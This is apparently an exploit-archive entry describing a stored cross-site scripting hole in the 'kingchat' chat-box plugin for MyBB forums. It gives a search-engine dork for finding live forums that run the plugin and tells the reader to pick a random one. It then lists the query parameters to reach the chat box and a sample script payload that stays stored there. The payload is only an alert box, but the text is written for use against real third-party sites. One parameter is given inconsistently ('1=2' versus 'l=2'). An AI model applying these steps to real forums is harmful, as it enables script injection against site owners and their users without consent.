29 lines
No EOL
894 B
Text
29 lines
No EOL
894 B
Text
Exploit Title: MyBB 'kingchat' chat-box plugin.
|
|
Google Dork: inurl:/kingchat.php?
|
|
Date: 8/12/12
|
|
Author: VipVince
|
|
Vendor Homepage: http://mods.mybb.com/
|
|
Software LinK: http://mods.mybb.com/view/kingchat
|
|
Tested on: Windows
|
|
|
|
Using the dork inurl:/kingchat.php? you will see multiple forums running this chat plugin.
|
|
|
|
Note *Registration on the forums is required* for persistent XSS to work.
|
|
|
|
Now click a random forum with this plugin installed and you will see this:
|
|
|
|
http://vulnforum.com/kingchat.php?notic
|
|
|
|
Remove 'notic' at the end of the URL and add "chat=2&1=2" to our query so it becomes:
|
|
|
|
http://server/kingchat.php?chat=2&l=2
|
|
|
|
You will see the vulnerable chat box :). Submit your XSS for instance <script>alert("vipvince")</script>
|
|
|
|
Now to see our saved JavaScript alert go to:
|
|
|
|
http://server/kingchat.php?chat=2&l=2&message=
|
|
|
|
Your persistant XSS will be stored here.
|
|
|
|
Enjoy ;). VipVince. |